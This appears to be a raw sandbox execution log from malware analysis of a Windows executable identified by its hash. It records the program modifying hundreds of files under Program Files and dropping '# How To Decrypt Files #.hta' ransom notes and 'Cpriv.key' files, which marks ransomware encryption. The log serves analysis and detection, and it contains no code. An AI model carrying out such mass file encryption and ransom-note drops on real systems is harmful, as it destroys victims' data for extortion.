de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\calendar_single_bkg.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Word.en-us\WordMUI.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\FORMS\1033\SCDRESPL.ICO de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\16to9Squareframe_Buttongraphic.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00158_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\MSOUC_COL.HXC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGBARBLL.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\EMAILMOD.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\sr\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\Lang\ku-ckb.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\fr-FR\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107042.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\kn\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\mr\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_it.properties de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-sendopts.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SL00256_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\de\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\VSTA\Pipeline.v10.0 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-coredump_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HM00172_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\1.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-new.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04267_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsViewAttachmentIconsMask.bmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SPRNG_01.MID de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Biscay\TAB_ON.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\NotifierUpArrow.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\IMAGE.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\Xusage.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-queries_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\TN00217_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-utilities.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0086420.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\logo.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\images\play_down.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105276.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\images\delete_down.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_gray_thunderstorm.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\rss_headline_glow_docked.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\images\reveal_down.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\UnprotectCompare.ppsx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGMN097.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0178639.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\en-US\gadget.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0215709.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Effects\Opulent.eftx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0239943.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02270_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WB01239_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\SpringGreen.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\bg\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\Lang\yo.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02067_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jre7\lib\content-types.properties de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02227_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR29F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ro\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\CAPSULES\THMBNAIL.PNG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\Title_Trans_Scene_PAL.wmv de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\MANIFEST.MF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\pt_BR\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Office.en-us\OfficeMUISet.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\license.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.nl_zh_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02424_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\mset7fr.kic de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\bg_Premium.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\CALENDAR.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\utilityfunctions.js de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\UseInvoke.xltm de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Proof.fr\Proof.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\FLY98SP.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0215070.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02400_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE02270_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Sync Framework\v1.0\Runtime\x64\resources\1033\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\Vdk10.lng de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\IRIS\PREVIEW.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\com.jrockit.mc.console.ui.notification_contexts.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\STSLIST.CHM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGMN027.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Stationery\1033\DADSHIRT.HTM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_windy.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\Smart Tag\LISTS\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21421_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00438_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Effects\Black Tie.eftx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR4B.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\3difr.x3d de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\Help\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Proofing.en-us\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jre7\lib\zi\America\Argentina\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\en-US\settings.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04174_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO01777_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Colors\Verve.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_left_pressed.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\AFTRNOON\PREVIEW.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgeCallbacks.h de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\uk\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Resources\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\PrivateAssemblies\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\MSACCESS.DEV.HXS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Library\SOLVER\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0200377.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Colors\Slipstream.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BrightOrange\TAB_OFF.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.operations.nl_ja_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\org-openide-util_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR17F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_right_disabled.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\ECLIPSE\ECLIPSE.INF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Americana\TAB_OFF.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0086478.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099196.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00299_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Oasis\TAB_ON.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Stationery\1033\JUDGESCH.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\Smart Tag\LISTS\1033\TIME.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\16_9-frame-background.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-io-ui_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0281008.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SY00110_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\MEDIA\PUSH.WAV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\LOGO98.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Media Player\Network Sharing\wmpnss_bw32.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.zh_CN_5.5.0.165303\feature.properties de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\CONVERT\OL.SAM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\Shared24x24ImagesMask.bmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked-loading.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\System\ado\msado27.tlb de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\PAPYRUS\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_es.properties de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\ECLIPSE_.RSA de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\dsn.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187863.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\bg_Casual.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGWEBREF.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\Help\1049\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\Lang\co.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\ipscat.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.HK.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\System\msadc\adcjavas.inc de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\bg_LightSpirit.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PROTTPLN.XLS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\jaccess.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\msmdsrv.rll de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\VIEW.ICO de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\OutlookAutoDiscover\SWBELL.NET.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\square.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.nl_ja_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02742U.BMP de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0230558.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Fonts\Concourse.xml 